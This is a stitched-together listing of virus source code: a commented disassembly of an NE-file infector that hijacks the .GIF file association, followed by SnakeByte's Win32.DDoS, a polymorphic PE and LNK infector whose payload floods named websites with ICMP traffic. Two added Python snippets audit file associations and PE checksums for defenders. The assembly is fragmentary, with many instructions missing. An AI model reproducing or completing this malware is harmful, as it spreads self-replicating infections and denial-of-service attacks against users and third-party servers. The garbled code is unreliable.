mov dx,offset exe_wildcard
CALL infect_directory ; infect one EXE file in C:\WIN31
mov bx,1
mov cx,offset C_win311
mov dx,offset exe_wildcard
CALL infect_directory ; infect one EXE file in C:\WIN311
mov bx,1
mov cx,offset C_win95
mov dx,offset exe_wildcard
CALL infect_directory ; infect one EXE file in C:\WIN95
mov bx,1
mov cx,offset empty_string
mov dx,offset scr_wildcard
CALL infect_directory ; infect one SCR in current dir
pop ds ; restore DS
restore_host:
add sp,size stack_frame ; free room on stack
C_win db "C:\WIN\", 0
; The following two subroutines are not used in the whole virus. I guess that
; they were just used in the first generation sample, and accidentally left
; in by the virus author. That's why I also used them in the first generation
; carrier of the disassembly.
encrypt_wildcard:
push si ; save SI
push di ; save DI
push es ; save ES
push ds ; ES=DS
pop es
pop es ; restore ES
pop di ; restore DI
encrypt_wildcard_loop:
inc byte ptr [si] ; encrypt one byte from string
inc si ; next byte
loop encrypt_wildcard_loop
pop si ; restore SI
RET
encrypt_path:
push si ; save SI
push di ; save DI
push es ; save ES
push ds ; ES=DS
pop es
pop es ; restore ES
pop di ; restore DI
encrypt_path_loop:
dec byte ptr [si] ; encrypt one byte from string
inc si ; next byte
loop encrypt_path_loop
pop SI ; restore SI
RET
decrypt_path:
cld ; clear direction flag
push di ; save DI
push es ; save ES
push ds ; ES=DS
pop es
pop es ; restore ES
pop di ; restore DI
decrypt_path_loop:
lodsb ; load a byte from source string
inc al ; decrypt it
stosb ; store decrypted byte
loop_decrypt_path:
loop decrypt_path_loop
decrypt_wildcard:
cld ; clear direction flag
push di ; save DI
push es ; save ES
push ds ; ES=DS
pop es
pop es ; restore ES
pop di ; restore DI
decrypt_wildcard_loop:
lodsb ; load a byte from source string
dec al ; decrypt it
stosb ; store decrypted byte
loop_decrypt_wildcard:
loop decrypt_wildcard_loop
C_windows db "C:\WINDOWS\"
empty_string db 0
infect_directory:
push ds ; save DS
push es ; save ES
push cs ; DS=CS
pop ds
push ss ; ES=SS
pop es
mov si,dx
CALL decrypt_wildcard ; decrypt the wildcard to full_filespec
pop es ; restore ES
pop ds ; restore DS
do_file:
push es ; save ES
push di ; save DI
push ss ; ES=SS
pop es
pop di ; restore DI
pop es ; restore ES
push dx ; save DX
pop dx ; restore DX
not_readonly:
CALL infect_file ; infect the file!
JC findnext ; on error while infecting search on!
dec bx ; decrement infection counter
JZ done_directory ; enough files infected?
findnext:
mov ah,4Fh ; find next file
do_file_search:
int 21h ; do the file search
JNC do_file ; if no error happened, process file
done_directory:
RET
C_win31 db "C:\WIN31\", 0
exe_wildcard db "*.EXE", 0
scr_wildcard db "*.SCR", 0
infect_file:
pushad ; save all 32bit registers
CALL get_file_date_time_size
CALL EPO
JC close_tmp_file
mov [bp.module_ordinal],eax ; save module index and ordinal
mov [bp.our_reloc_offs],edx ; save offset of relocation item
xor eax,eax ; EAX=0
mov ax,word ptr [bp.rw_buffer+22h] ; EAX=offset of segment
; descriptor table from NE hdr
add eax,[bp.new_header_offs]; EAX=offset of segment descriptor
; table from file start
; fixup the offsets of the other NE header tables (all are after the segment
; table and therefore shifted back). It is assumed that all tables are in the
; same order in the file as their offsets are stored in the NE header (except
; for the entry table, which should be the second last).
pop ds ; restore DS
JC close_tmp_file
pop ds ; restore DS
JC close_tmp_file
pop ds ; restore DS
JC close_tmp_file
pop ds
JC close_tmp_file
JC delete_tmp_file
mov [bp.source_handle],ax ; save handle
close_tmp_file:
mov bx,[bp.dest_handle] ; BX=handle of temp file
mov ah,3Eh ; close temp file
int 21h
delete_tmp_file:
lea dx,[bp.tmp_filename] ; DS:DX=pointer to temp file name
mov ah,41h ; delete temp file
int 21h
close_file:
mov bx,[bp.source_handle] ; BX=handle of victim file
mov ah,3Eh ; close victim file
int 21h
exit_infect:
popad ; restore all 32bit registers
RET
C_win311 db "C:\WIN311\", 0
; ----- GET DATE, TIME AND SIZE OF THE OPENED FILE --------------------------
get_file_date_time_size:
push cx ; save CX and DX
push dx
RET
C_win95 db "C:\WIN95\", 0
; ----- COPY ECX BYTES FROM VICTIM FILE TO TEMP FILE ------------------------
copy_file_block:
pushad ; save all 32bit registers
sub sp,256 ; allocate a 256 byte buffer from stack
mov [bp.bytes_to_copy],ecx ; save length of block to copy
mov dx,sp ; DX=offset buffer
copy_file_block_loop:
cmp [bp.bytes_to_copy],0 ; whole block moved?
JE copy_file_block_done ; then we're done
cmp [bp.bytes_to_copy],256 ; more than 256 bytes left?
JBE copy_remaining_bytes_block
mov cx,256 ; then just copy 256 bytes
JMP read_file_block
copy_remaining_bytes_block:
mov cx,word ptr [bp.bytes_to_copy] ; copy all bytes left
read_file_block:
push cx ; save size to read/write
mov bx,[bp.source_handle] ; BX=handle of source file
mov ah,3Fh ; read from file function
push ds ; save DS
push ss ; DS=SS
pop ds
int 21h
pop ds ; restore DS
mov bx,[bp.dest_handle] ; BX=handle of destination file
mov cx,ax ; write as many bytes as were read
mov ah,40h ; write block to temporary file
push ds ; save DS
push ss ; DS=SS
pop ds
int 21h
pop ds ; restore DS
cmp cx,ax ; sizes of read block=written block ?
pop cx ; restore size to read and write
JNZ copy_file_block_error ; if not equal, then an error occurred
cmp cx,ax ; size of read/written block equal
; to the size we planned to read?
JNE copy_file_block_done ; if not, we're at the end of the file
copy_file_block_error:
stc ; set carry flag (indicate error)
JMP copy_file_block_ret
copy_file_block_done:
clc ; clear carry flag (indicate success)
add sp,256 ; remove buffer from stack
popad ; restore all 32bit registers
copy_file_block_ret:
RET
search_module_name:
push bx ; save BX
push es ; save ES
push ss ; ES=SS
pop es
search_module_name_loop:
mov si,sp ; SI=buffer on stack
add si,128 ; SI=imported-names table buffer
add si,[bx] ; add offset from module-reference
; table to get an actual entry in the
; imported-names table
JZ found_module_name
inc cx ; increment CX (module counter)
add bx,2 ; go to next entry in module-
; reference table
check_if_all_modules_done:
cmp cx,word ptr [bp.rw_buffer+1Eh] ; done all modules ?
JNE search_module_name_loop ; if not, search on
JMP module_name_not_found ; if yes, the search failed
found_module_name:
mov ax,cx ; AX=module counter
inc ax ; make counter start from 1
add sp,256 ; remove buffer from stack
clc ; clear carry flag (indicate success)
JMP exit_search_module_name
module_name_not_found:
add sp,256 ; remove buffer from stack
stc ; Set carry flag
exit_search_module_name:
pop es ; restore ES
pop bx ; restore BX
RET
EPO:
check_VBrun:
; create the string 8, "VBRUN300" in tmp_buffer
mov dword ptr [bp.tmp_buffer+4],9062F740h
mov dword ptr [bp.tmp_buffer+0],0EDC4FE68h
mov byte ptr [bp.tmp_buffer+8],"0"
add dword ptr [bp.tmp_buffer+4],9FD05715h
add dword ptr [bp.tmp_buffer+0],647D57A0h
lea dx,[bp.tmp_buffer] ; Load effective addr
CALL search_module_name
JC end_EPO
mov dx,64h ; ordinal of THUNRTMAIN API
search_API_reference:
push ax ; save AX (module index)
push dx ; save DX (API function ordinal)
search_API_reference_loop:
push cx ; save CX
pop cx
JC EPO_failed
found_API_reference:
mov edx,[bp.entry_CS_relocs]
add edx,2
shl ecx,3 ; ECX=ECX*8 (size of a reloc item)
add edx,ecx ; EDX=offset of reloc item in file
mov eax,dword ptr [bp.module_index]; EAX=module index/API ordinal
EPO_failed:
add sp,size EPO_stack_frame ; clear buffer from stack
pop bp
stc ; set carry flag (indicate error)
end_EPO:
RET
gif_body:
include gif.inc ; the body of the gif file converted
; to DB instructions
gif_body_size EQU ($ - offset gif_body)
shell_open_command db "\SHELL\OPEN\COMMAND", 0
l_shell_open_command EQU ($ - offset shell_open_command)
payload:
push es ; save ES
push bp ; save BP (main stack frame pointer)
RegQueryValue_success:
cmp byte ptr [bp.reg_buffer1],0; has it returned an empty string?
JE try_shell_open_command
push ss ; ES=SS
pop es
push ds ; save DS
push cs ; DS=CS
pop ds
try_shell_open_command:
mov word ptr [bp.reg_buffer1],"G."
mov dword ptr [bp.reg_buffer1+2],"FI"
push ds ; save DS
push cs ; DS=CS
pop ds
push ss ; ES=SS
pop es
RegQueryValue_success2:
; reg_buffer2 now contains the command line of the program that is
; run whenever the user double-clicks a .GIF file
push ss ; ES=SS
pop es
lea di,[bp.reg_buffer2] ; DI=pointer to commandline connected
; with .GIF files
push di ; save DI
xor al,al ; AL=0
mov cx,0FFFFh ; CX=maximal word
repne scasb ; search for the end of the string
dec di ; DI points now to the terminating 0
mov ax,di ; AX=end of string
pop di ; restore DI (start of string)
sub ax,di ; AX=length of string
mov cx,ax ; CX=length of string
mov al,"%" ; search the commandline for where
; the name of the gif will be on
; program start
cld ; clear direction flag
repne scasb ; search for the % sign
JNZ exit_payload ; if not found, exit payload
cmp byte ptr [di],"1" ; is it the %1, like it has to be?
JNE exit_payload ; if not, something is wrong
cmp byte ptr [di-2],'"' ; is there the quotes sign?
JNE dont_skip_quotes
dec di ; if yes, skip it
dont_skip_quotes:
dec di ; go to the start of the first
; parameter in the commandline, the
; name of the .GIF file
pop ds ; restore DS
restore_gif_commandline:
push ss ; ES=SS
pop es
lea di,[bp.reg_buffer2] ; DI=pointer to commandline connected
; with .GIF files
cld ; clear direction flag
push di ; save DI
xor al,al ; AL=0
mov cx,0FFFFh ; CX=maximal word
repne scasb ; search for the end of the string
dec di ; DI points now to the terminating 0
mov ax,di ; AX=end of string
pop di ; restore DI (start of string)
sub ax,di ; AX=length of string
add di,ax
mov cx,ax ; CX=length of string
mov al," " ; search for the blank
std ; set direction flag
repne scasb ; search for the end of the filename
JNZ exit_payload ; if not found, exit
add di,2 ; go to 1st param (file to display)
cmp byte ptr [di],"C" ; is there "C:\TENTACLE.GIF"
JNE exit_payload ; if not, there's nothing to restore
cmp dword ptr [di+1],"ET\:" ; make really sure
JNE exit_payload
mov byte ptr [di],"%" ; restore the correct cmdline "%1"
mov word ptr [di+1],"1"
CALL call_RegSetValue ; set it.
exit_payload:
add sp,size payload_stack_frame ; free room on stack
pop bp ; restore BP (main stack frame ptr)
pop es ; restore ES
RET
call_RegQueryValue:
;* push dword ptr 1 ; HKEY_CURRENT_USER
db 66h,68h,1,0,0,0 ; fixup - byte match
RET
call_RegSetValue:
;* push dword ptr 1 ; HKEY_CURRENT_USER
db 66h,68h,1,0,0,0 ; fixup - byte match
RET
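The payload above reads the command line registered for .GIF files, walks it to the "%1" placeholder (stepping over an optional quote), swaps that placeholder for its own fixed path, and on a later run looks for "C:\TENTACLE.GIF" before putting "%1" back. The same parsing serves a defender who wants to know whether a file association has been tampered with. The following Python is an added example, not part of Black Jack's disassembly: it tokenises an exported shell\open\command value and reports whether the first argument is still a placeholder or has become a literal file path. The sample command strings and the viewer path C:\PROGRAMS\VIEWER.EXE are constructed; C:\TENTACLE.GIF is the path the disassembly checks for.

```python
"""Audit a file-association "shell\\open\\command" string for a replaced %1.

Added defensive example, not part of the disassembly. The payload above rewrites
the .GIF handler so that the "%1" placeholder becomes a fixed path; this checker
reports that condition on exported command strings (sample values constructed).
"""
import re
from dataclasses import dataclass

# %1 / %L / %* are the placeholders a handler may legitimately use for the opened file.
PLACEHOLDER_RE = re.compile(r"%[1-9lL*]")


@dataclass
class Verdict:
    program: str     # executable the association starts
    first_arg: str   # first argument after the program, '' if none
    status: str      # "ok", "hijacked", "no_placeholder" or "empty"


def split_command(cmd: str) -> list:
    """Split a Windows command line into tokens, honouring double quotes
    (the same quoted-or-not distinction the payload handles with its dec di)."""
    tokens, current, quoted = [], [], False
    for ch in cmd:
        if ch == '"':
            quoted = not quoted
        elif ch.isspace() and not quoted:
            if current:
                tokens.append("".join(current))
                current = []
        else:
            current.append(ch)
    if current:
        tokens.append("".join(current))
    return tokens


def audit_open_command(cmd: str) -> Verdict:
    """Classify one shell\\open\\command value."""
    tokens = split_command(cmd)
    if not tokens:
        return Verdict("", "", "empty")
    program, args = tokens[0], tokens[1:]
    first_arg = args[0] if args else ""
    if PLACEHOLDER_RE.fullmatch(first_arg):
        return Verdict(program, first_arg, "ok")          # "%1" is where it belongs
    if re.search(r"[\\:.]", first_arg):
        # A literal file name sits where the placeholder should be: every
        # double-click opens that file instead of the one the user chose.
        return Verdict(program, first_arg, "hijacked")
    return Verdict(program, first_arg, "no_placeholder")


# Constructed sample values, in the shape an analyst would export them from the registry.
SAMPLE_COMMANDS = {
    "clean_quoted":   '"C:\\PROGRAMS\\VIEWER.EXE" "%1"',
    "clean_unquoted": "C:\\PROGRAMS\\VIEWER.EXE %1",
    # The fixed path is the one the disassembly above checks for before restoring "%1".
    "hijacked":       '"C:\\PROGRAMS\\VIEWER.EXE" "C:\\TENTACLE.GIF"',
    "no_args":        '"C:\\PROGRAMS\\VIEWER.EXE"',
}


def audit_samples() -> dict:
    """Status per sample name, e.g. {"hijacked": "hijacked", ...}."""
    return {name: audit_open_command(cmd).status for name, cmd in SAMPLE_COMMANDS.items()}


if __name__ == "__main__":
    for name, cmd in SAMPLE_COMMANDS.items():
        v = audit_open_command(cmd)
        print(f"{name:15} {v.status:15} program={v.program!r} first_arg={v.first_arg!r}")
```

The tokenizer deliberately stops at the first argument: the disassembly only ever touches the token following the program name, so that is where a swapped placeholder shows up, and a handler that legitimately takes extra switches after "%1" is still reported as "ok".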
; ----- PATCH WINHELP -------------------------------------------------------
patch_winhelp:
cmp word ptr [bp.rw_buffer+1Ch],2 ; number of segments
JB exit_patch_winhelp ; it's not the WINHELP.EXE
; we know, don't patch it
exit_patch_winhelp:
RET
RegQueryValue dd 0000FFFFh
RegSetValue dd 0000FFFFh
org_entry dd 0000FFFFh
virus_end:
; Most data of the virus is stored in a buffer on the stack. The following
; structure represents the layout of this stack frame:
stack_frame struc
dta db 2Bh dup(?)
tmp_buffer db 10 dup(?)
bytes_to_copy dd ?
full_filename db 24 dup(?)
full_filespec db 24 dup(?)
tmp_filename db 16 dup(?)
source_handle dw ?
dest_handle dw ?
file_date dw ?
file_time dw ?
file_size dd ?
new_header_offs dd ?
end_of_NE_hdr dd ?
alignment_unit dd ?
first_segm_offs dd ?
new_sect_descr dw 4 dup(?)
rw_buffer db 64 dup(?)
dw ?
our_reloc_offs dd ?
module_ordinal dd ?
new_entry_CS dw ?
new_entry_IP dw ?
stack_frame ends
; The data that is used in the EPO engine of the virus uses another stack
; frame that is represented in this structure:
EPO_stack_frame struc
entry_CS_offset dw ?
entry_CS_phys dw ?
entry_CS_flags dw ?
entry_CS_virt dw ?
reloc_type dw ?
reloc_offs dw ?
reloc_what dd ?
module_index dw ?
API_ordinal dw ?
entry_CS_relocs dd ?
relocs_number dw ?
EPO_stack_frame ends
payload_stack_frame struc
reg_buffer1 db 40h dup(?)
reg_buffer2 db 40h dup(?)
size_reg_buffer dd ?
payload_stack_frame ends
first_gen_entry:
push ds ; save DS
pusha ; save all registers
push ss ; DS=SS
pop ds
mov bx,0FFFFh
mov cx,offset empty_string
mov dx,offset exe_wildcard
CALL infect_directory ; infect all EXE files in current dir
mov ah,9
mov dx,offset first_gen_message
int 21h
mov ax,4C00h
int 21h
end first_gen_entry
;
; ***************************************************************************
; -----------------[ Win32.DDoS by SnakeByte { KryptoCrew } ]----------------
; ***************************************************************************
;
;
;
; Please note that it is illegal to spread viruses, so if you compile this
; code, just test it on a closed system and don't place it in the wild !
; I am not responsible for your actions .. as always ;)
;
;
;
;
; This is the first Windows virus I've written so far, and some parts are from
; Win32.Aztec by Billy Belcebu, because at the time I wrote this thing, not everything
; was as clear in my mind as it is now. I hope I can present you some better things from me
; in the future.
;
; This is also my first polymorphic virus ever ;) so don't expect too much from the
; poly engine. I did not understand much of the code from other poly engines, but
; now, after coding one on my own, I do, so maybe I can code a better one next time ;)
;
; The first layer is nearly completely polymorphic. I use junk opcodes like mov, add ...
; and try to make sure they don't look completely useless.
; I also use several ways to decrypt the virus (xor, neg, not ...) and
; several methods to do the loop. The size will always be in ECX and
; the start in ESI, but I use several methods to put the values into
; the registers so there is nothing static.
; The only static thing left is the call to the polymorphic decryptor ;(
;
;
; I was only able to test this thing on a Win95 PC, so I don't know if it will
; work on other systems, but I think it will. Two friends made some tests under
; NT and 2k with a beta, and it worked, so I hope this final version will also do.
;
;
; It tries to load the following 4 DLLs:
;
; - Kernel32.dll <- the only one we really need to work, the others are for fun
;
; - Imagehlp.dll <- try to create a valid CRC for the PE-Header of infected files
; - Advapi32.dll <- get some data from the registry
; - Wsock32.dll <- Payload : Ping-flood a server
;
;
;
;
; What does this Virus do :
;
; - 1st generation infects just the current directory (easier to infect just some files *eg*)
; - Gets APIs with LoadLibraryA & GetProcAddress
; - Tries to load ImageHlp.dll to create checksums with the CheckSumMappedFile function
; - Infects the current, the Windows and the system directory and parses some
; random directories on drive C:
; - Follows LNK files (does not work with NT / 2k)
; - Removes and restores file attributes
; - Parses drive C:, enters a folder with a chance of 1 in 3
; - Retrieves the Start menu folder from the registry and parses it (follows LNK files there)
; - If everything runs well it will infect 100 files all over the disk
; - Generates a polymorphic decryptor which is used for all files infected in one run
; - Uses 2 layers of decryption (1st is poly, 2nd is harder to debug / emulate)
; - Does not infect files smaller than 40 kb
; - Will not infect files with AV, AN or DR in the filename
; - Payload is an ICMP flood on one of these servers :
;
; Sunday = www.bundesnachrichtendienst.de
; Monday = French Secret Service ( dgse.citeweb.net )
; Tuesday = www.avp.com ( AV )
; Wednesday = www.lockdown2000.com
; Thursday = www.f-secure.com
; Friday = www.norton.com
; Saturday = www.zonelabs.com
;
; *# Please note that i choose these servers because I think they can #*
; *# handle such an attack, if any idiot would release this into the wild. #*
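The feature list above says the virus loads Imagehlp.dll to recompute the PE header checksum (CheckSumMappedFile) of each file it infects. The lesson for a defender is the converse: a CheckSum field that validates proves nothing about integrity, because whoever writes the file can recompute it, while a stale checksum after a modification is a reliable sign that the writer did not bother. The Python below is an added example, not SnakeByte's code; it reimplements the published PE checksum algorithm (a 16-bit end-around-carry sum over the whole file, skipping the CheckSum field, plus the file length) and runs it over a constructed minimal PE32 skeleton (DOS header with e_lfanew = 0x40, CheckSum at optional-header offset 64). Every field value in the sample image is constructed.

```python
"""PE header checksum, as CheckSumMappedFile computes it.

Added example, not from Win32.DDoS. Shows why a valid CheckSum field is no proof
of integrity: the field is trivially recomputed by whoever writes the file. The
sample image is constructed (DOS header, e_lfanew = 0x40, PE32 optional header).
"""
import struct

IMAGE_SIZE = 512                 # constructed sample length


def checksum_field_offset(image: bytes) -> int:
    """File offset of OptionalHeader.CheckSum: e_lfanew + 4 (sig) + 20 (COFF) + 64."""
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    return e_lfanew + 24 + 64


def pe_checksum(image: bytes, field_offset: int) -> int:
    """Sum of all 16-bit words with end-around carry, skipping the 4-byte CheckSum
    field, plus the file length (the published PE checksum algorithm)."""
    total = 0
    length = len(image)
    for off in range(0, length - 1, 2):
        if off in (field_offset, field_offset + 2):
            continue
        total += image[off] | (image[off + 1] << 8)
        total = (total & 0xFFFF) + (total >> 16)
    if length & 1:                       # odd trailing byte counts as a low byte
        total += image[-1]
        total = (total & 0xFFFF) + (total >> 16)
    total = (total & 0xFFFF) + (total >> 16)
    return (total + length) & 0xFFFFFFFF


def verify_checksum(image: bytes) -> tuple:
    """(stored, computed, matches) for a PE image."""
    off = checksum_field_offset(image)
    stored = struct.unpack_from("<I", image, off)[0]
    computed = pe_checksum(image, off)
    return stored, computed, stored == computed


def stamp_checksum(image: bytes) -> bytearray:
    """Return a copy with CheckSum set to the correct value (what an infector does
    after appending itself, so the header validates again)."""
    out = bytearray(image)
    off = checksum_field_offset(out)
    struct.pack_into("<I", out, off, pe_checksum(out, off))
    return out


def build_sample_pe() -> bytearray:
    """Constructed minimal PE32 skeleton: only the fields the checksum demo needs."""
    img = bytearray(IMAGE_SIZE)
    img[0:2] = b"MZ"
    struct.pack_into("<I", img, 0x3C, 0x40)          # e_lfanew
    img[0x40:0x44] = b"PE\0\0"
    struct.pack_into("<H", img, 0x44, 0x014C)        # Machine: i386
    struct.pack_into("<H", img, 0x54, 0xE0)          # SizeOfOptionalHeader
    struct.pack_into("<H", img, 0x58, 0x10B)         # Magic: PE32
    return img


def demo() -> dict:
    """Valid -> tampered (stale checksum) -> re-stamped (valid again)."""
    good = stamp_checksum(build_sample_pe())
    tampered = bytearray(good)
    tampered[0x180] ^= 0x41                           # one byte changed in the body
    restamped = stamp_checksum(tampered)
    return {
        "original_ok": verify_checksum(good)[2],
        "tampered_ok": verify_checksum(tampered)[2],
        "restamped_ok": verify_checksum(restamped)[2],
    }


if __name__ == "__main__":
    print(demo())   # {'original_ok': True, 'tampered_ok': False, 'restamped_ok': True}
```

The third step of demo() is the one that matters for triage: after re-stamping, the tampered image validates just like the original, so a checksum check belongs in the "quick mismatch means modified" category, never in the "match means clean" one.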
;
;
;
;
;
;
; To build this code, use TASM 5.0 and pewrsec.
;
;
;
;
;
;
; Thanks and greetz fly to these people:
;
; Billy Belcebu - Your Win32 VWG is just great ..
; ( you'll find some of your code [Win32.Aztec] here ;)
; Evul - Thanks for hosting my site at coderz.net
; Ciatrix - Hope you carry on your good work with VDAT !
; SnakeMan - Hope you get more entries *g* --> http://altavirus.cjb.net
; PhilippP - Thanks for the thrilling test in 2k .. ;)
; BumbleBee - Still thinking of Sex ?
; diediedie - Thnx for demotivating me... :)
; asmodeus - nice beginner lesson in poly ;)
; darkman - just believe me: the question was stupid ;)
;
;
;
;
;
; ***************************************************************************
; ---------------------------[ Here we start ]-------------------------------
; ***************************************************************************
.586p
.model flat
jumps ; Jumps get calculated
; ( I know not good for optimizing.. )
.radix 16 ; All numbers are Hexadecimal
; I once searched for a forgotten 'h'
; 2 weeks until I found this bug.. :P
; some API's
extrn ExitProcess:PROC ; fake host for 1. Generation
FILETIME STRUC
FT_dwLowDateTime dd ?
FT_dwHighDateTime dd ?
FILETIME ENDS
.code
; ***************************************************************************
; -------------[ Delta Offset and searching for the Kernel Addy ]------------
; ***************************************************************************
Virus: ; Here we go
Delta:
mov ebp, offset Delta ; I want to do this a bit different
neg ebp ; than usual, who knows, maybe this
pop eax ; fools some bad heuristics
add ebp, eax
; save esp
mov dword ptr [ebp+XESP], esp
mov esi, [esp] ; let's get the return address of the Create Process API
xor si, si ; round it to a full page
; ***************************************************************************
; -------------------------[ let's get the API's ]---------------------------
; ***************************************************************************
xchg eax, ecx ; If we didn't get this API or the other one, we quit !
jecxz ExecuteHost ; thnx to Billy ;)
IMAGEHLP db 'Imagehlp',0 ; this dll is not necessarily needed, but dlls will
; only get infected, if we are able to use the CheckSumMappedFile
; Function from this dll to create a checksum
; it is delivered with win9x, NT and several compilers.
WSOCK db 'wsock32.dll',0
; we need this one here to perform a ping
; ( not needed for the virus, but the payload )
; ***************************************************************************
; ------------------[ Outbreak ! Here we start infecting ]-------------------
; ***************************************************************************
; ***************************************************************************
; -----------------------[ Parse Directories ]-------------------------------
; ***************************************************************************
InitParsing:
InfectWinDirAgain:
mov [ebp+InfCounter], 20d
call ParseFolder ; let's parse the Start menu and follow all
; LNK files inside ;)
ParseFolder:
call InfectCurDir ; infect the current directory
cmp [ebp+InfCounter],0
jbe EndParsing ; we infected enough ? ok, leave !
GetOtherDir:
; first of all we check if this
; is a valid directory
mov eax, dword ptr [ebp+WFD_dwFileAttributes]
and eax, 10h ; if not we get the next
jz NoThisOne ; one
push 03h
pop ecx
call GetRand
NoThisOne:
call FindNextFileProc
jmp ParseFolder
; ***************************************************************************
; -----------------[ Let's get the Start menu folder ]-----------------------
; ***************************************************************************
NoStartMenue:
ret
; Misc Data .. ;)
Folders db '*.',0 ; search for directories
RootDir db 'C:\',0 ; we want to start parsing at root of Drive C:
db 'FindFirstFileA', 0
db 'FindNextFileA', 0
db 'FindClose', 0
db 'CreateFileA', 0
db 'SetFileAttributesA', 0
db 'CloseHandle', 0
db 'CreateFileMappingA', 0
db 'MapViewOfFile', 0
db 'UnmapViewOfFile', 0
db 'GetWindowsDirectoryA', 0
db 'GetSystemDirectoryA', 0
db 'GetCurrentDirectoryA', 0
db 'SetCurrentDirectoryA', 0
db 'GetFileAttributesA', 0
db 'GetTickCount', 0
db 'CreateThread',0
db 'GetSystemTime',0
ImageHLPNames:
db 'CheckSumMappedFile', 0h
ADVAPI32Names:
db 'RegOpenKeyExA',0
db 'RegQueryValueExA',0
db 'RegCloseKey',0
WSOCK32Names:
db 'socket',0
db 'WSACleanup',0
db 'WSAStartup',0
db 'closesocket',0
db 'sendto',0
db 'setsockopt',0
; ***************************************************************************
; --------------[ Retrieve API's with GetProcAddress ]-----------------------
; ***************************************************************************
GotZero:
inc esi
pop ecx ; get ecx ( counter )
EndApi3:
ret
; ***************************************************************************
; --------------[ Search Kernel Export Table for API's ]---------------------
; ***************************************************************************
mov esi, [ebp+NTableVA] ; Get the Name Pointer Table Addy in esi
SearchNextApi1:
push esi ; Save Pointer Table
lodsd
add eax, [ebp+MZAddy] ; make it VA
FoundApi1:
pop esi ; clear stack ( we don't want buffer overflows
; ok, we want them, but not here *bg* )
NotFoundApi1:
xor eax, eax ; We didn't find the API we need :(
ret ; We set EAX to 0 to show we have to
; return to the host..
; ***************************************************************************
; -------------------[ Execute the original Program ]------------------------
; ***************************************************************************
add eax,12345678h
org $-4
retBas dd 0h
jmp eax
FirstGenHost:
push 0h ; Stop executing this stuff ( first Generation
call ExitProcess ; only )
; ***************************************************************************
; ----------------[ We try to find the Kernel Address ]----------------------
; ***************************************************************************
GK1:
cmp byte ptr [ebp+K32Trys], 00h
jz NoKernel ; Did we pass our limit of 50 pages ?
GK2:
sub esi, 10000h ; Get the next page
dec byte ptr [ebp+K32Trys]
jmp GK1 ; Check it
CheckDLL:
add edi, 16h ; check for the Dll-Flag
mov bx, word ptr [edi] ; get characteristics
and bx, 0F000h ; we need just the Dll-Flag
cmp bx, 02000h
jne GK2 ; if it is no dll go on searching
K32Trys db 5h ; Search-Range
; ***************************************************************************
; -----------------[ Infection of the current directory ]--------------------
; ***************************************************************************
inc eax
jz EndInfectCurDir1 ; If there are no files, we return
dec eax
InfectCurDirFile:
; filename in esi
lea esi, [ebp+WFD_szFileName]
call InfectFile ; Try to infect it !
call FindNextFileProc
filemask db '*.*', 0 ; we search for all files, not just exe files
; ***************************************************************************
; ---------------------[ Prepare infection of file ]------------------------
; ***************************************************************************
InfectFile: ; Here we prepare to infect the file
; the filename is in [ebp+WFD_szFileName]
; we open it and check if it is something
; we are able to infect...
; esi points to the filename..
; Get File-Attributes
lea eax, [ebp+WFD_szFileName]
push eax
call dword ptr [ebp+XGetFileAttributesA]
; save them
mov dword ptr [ebp+Attributes], eax
inc eax
jz NoInfection ; if we failed we don't infect
dec eax
call InfectLNK
Notagoodfile:
call UnMapFile ; we store the file..
; we restore the file-attributes
NoInfection:
ret
; ***************************************************************************
; ------------------------[ Open and close Files ]---------------------------
; ***************************************************************************
OpenFile:
inc eax
jz Closed ; if there is an error we don't infect the file
dec eax ; now the handle is in eax
; we save it
mov dword ptr [ebp+FileHandle],eax
CreateMap:
push ecx ; save the size
call UnMapFile2
Closed:
stc ; set carry flag
ret
ret
; ***************************************************************************
; -------------------------[ Infect an EXE-FILE ]----------------------------
; ***************************************************************************
call Align
pop edx
push 10d
pop ecx
call GetRand ; get random number ( we'll use the EAX value )
pop edi ; restore and xchange
pop edx
@Xor:
lodsb
xor al, dl
stosb
loop @Xor
jmp EndPolyCrypto
NegEncrypt:
dec edx
jnz NotEncrypt
@Neg:
lodsb
neg al
stosb
loop @Neg
jmp End2LCrypto
NotEncrypt: ; not byte ptr [esi]
dec edx
jnz IncEncrypt
@Not:
lodsb
not al
stosb
loop @Not
jmp End2LCrypto
End2LCrypto:
NoCRC:
ret
NoEXE: ; let's return and close the infected file
; this will also write it to disk !
stc
ret
; ***************************************************************************
; ------------------------[ Infect an LNK-FILE ]-----------------------------
; ***************************************************************************
LNKSearch: ; go on searching
dec esi
loop CheckLoop
; if we end here, we did not find the two dots.. :(
NoLNK:
ret
PointsDetected2:
dec esi
cmp byte ptr [esi], 0h
je NameDetected
pop esi
call FindFirstFileProc
inc eax
jz RestoreLNK ; If there are no files, we return
dec eax
; otherwise we save the handle
RestoreLNK:
lea edi, [ebp+WIN32_FIND_DATA]
lea esi, [ebp+Buffer] ; restore the old WIN32_FIND_DATA
mov ecx, 337d ; and some other data
rep movsb
; ***************************************************************************
; ---------------------[ The evil Part: the Payload ]------------------------
; ***************************************************************************
; ***************************************************************************
; -------------------------[ Align-Procedure ]-------------------------------
; ***************************************************************************
; let's align the size..
; eax - size
; ecx - base
Align:
push edx
xor edx, edx
push eax
div ecx
pop eax
sub ecx, edx
add eax, ecx
pop edx ; eax - new size
ret
; ***************************************************************************
; --------------------------[ FindFile Procedures ]--------------------------
; ***************************************************************************
FindFirstFileProc:
lea eax, [ebp+WIN32_FIND_DATA]
push eax
push esi
call dword ptr [ebp+XFindFirstFileA]
mov dword ptr [ebp+FindHandle], eax
ret
FindNextFileProc:
lea edi, [ebp+WFD_szFileName]
mov ecx, 276d ; we clear these fields !
xor eax, eax
rep stosb
CheckFileName:
pushad
lea esi, [ebp+WFD_szFileName]
mov edi, esi
mov ecx, 260d
EndConvert:
lea edi, [ebp+WFD_szFileName]
lea esi, [ebp+FileNames]
mov ecx, 3h
FileNameCheck: ; check for av-names
push ecx ; I don't want to infect them
mov ecx, 260d
CheckON:
lodsb
repnz scasb
or ecx, ecx
jnz AVFile
pop ecx
inc esi
loop FileNameCheck
jmp EndFileNameCheck
AVFile:
mov al, byte ptr [esi] ; check if the second char also matches
cmp byte ptr [edi], al
je GotAVFile
dec esi
jmp CheckON
GotAVFile:
pop ecx ; clear stack
popad
stc ; set carry flag
ret
EndFileNameCheck:
popad
clc
ret
;****************************************************************************
; ---------------------[ Checks for PE / MZ Signs ]--------------------------
; ***************************************************************************
; we check here for PE and MZ signs
; to identify the Executable we want to infect
; I do this a little bit different than usual *g*
CheckPESign:
cmp dword ptr [edi], 'FP' ; check if greater or equal to PF
